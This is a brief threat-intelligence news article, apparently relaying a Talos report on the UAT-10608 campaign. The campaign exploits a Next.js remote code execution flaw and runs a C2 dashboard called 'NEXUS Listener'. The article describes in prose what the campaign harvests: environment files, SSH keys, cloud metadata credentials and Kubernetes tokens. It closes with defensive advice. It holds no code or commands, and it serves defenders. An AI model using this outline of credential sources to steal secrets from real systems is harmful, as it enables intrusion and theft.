**Hacker Pranks Exclusive**

**Uncovering a Large-Scale Credential Harvesting Operation: UAT-10608**

In a shocking revelation, Talos has disclosed a massive automated credential harvesting campaign carried out by the threat cluster known as UAT-10608. This sophisticated operation has compromised at least 766 hosts across multiple geographic regions and cloud providers, leaving a trail of exposed data in its wake.

**The Campaign's Methodology: A Detailed Analysis**

The UAT-10608 campaign leverages a collection framework called "NEXUS Listener," which targets Next.js applications vulnerable to the React2Shell (CVE-2025-55182) vulnerability. This pre-authentication remote code execution (RCE) vulnerability allows attackers to deserialize payloads from inbound HTTP requests without adequate validation or sanitization.

Once a vulnerable endpoint is identified, the automated toolkit takes over, extracting and exfiltrating credentials harvested from the system via shell scripts dropped in /tmp with randomized names. The initial React exploit delivers a small dropper that fetches and runs the full multi-phase harvesting script.

**The NEXUS Listener Component: A Web Application for Exposed Data**

The framework uses a meta.json file to track execution state, making HTTP requests back to the C2 server running the NEXUS Listener component. This web application stores exfiltrated data in a database and makes it available via a graphical interface that includes statistics and search capabilities.

**Exposing the Breadth of the Victim Set**

The operation has compromised hosts across multiple geographic regions and cloud providers, with at least 766 hosts affected within a 24-hour period. The web application allows users to browse through all compromised hosts, selecting each one to view its corresponding exfiltrated data.

**Data Exposed: A Treasure Trove for Attackers**

An analysis of the NEXUS Listener instances reveals that:

* Environ.txt and jsenv.txt files contain runtime environments of compromised application processes, exposing third-party API credentials. * SSH keys (78% of hosts) enable lateral movement to any system trusting the compromised host's key identity. * AWS Instance Metadata Service (IMDS), GCP metadata server, and Azure IMDS are queried for cloud-hosted targets, yielding IAM role-associated temporary credentials. * Kubernetes tokens can allow attackers to enumerate cluster resources or escalate to cluster-admin depending on RBAC configuration.

**Implications for Organizations: Protect Your Assets**

This large-scale credential harvesting operation highlights the importance of securing web applications and protecting sensitive data. Organizations should:

* Investigate for artifacts related to UAT-10608, including SNORT ID 65554. * Review their cloud provider settings to ensure proper IAM role configuration. * Regularly update and patch vulnerable components. * Implement robust monitoring and detection capabilities.

**Conclusion**

The UAT-10608 campaign is a stark reminder of the threats facing organizations today. By understanding the methodology and tools used in this operation, we can better prepare ourselves for potential attacks. Stay vigilant and protect your assets – only then can you truly say you're prepared to face whatever hackers throw your way.

**Additional Resources:**

* IOCs for UAT-10608 available on our GitHub repository here. * Review Talos' full analysis of the NEXUS Listener instance data. * Stay up-to-date with the latest threat intelligence and research on Hacker Pranks.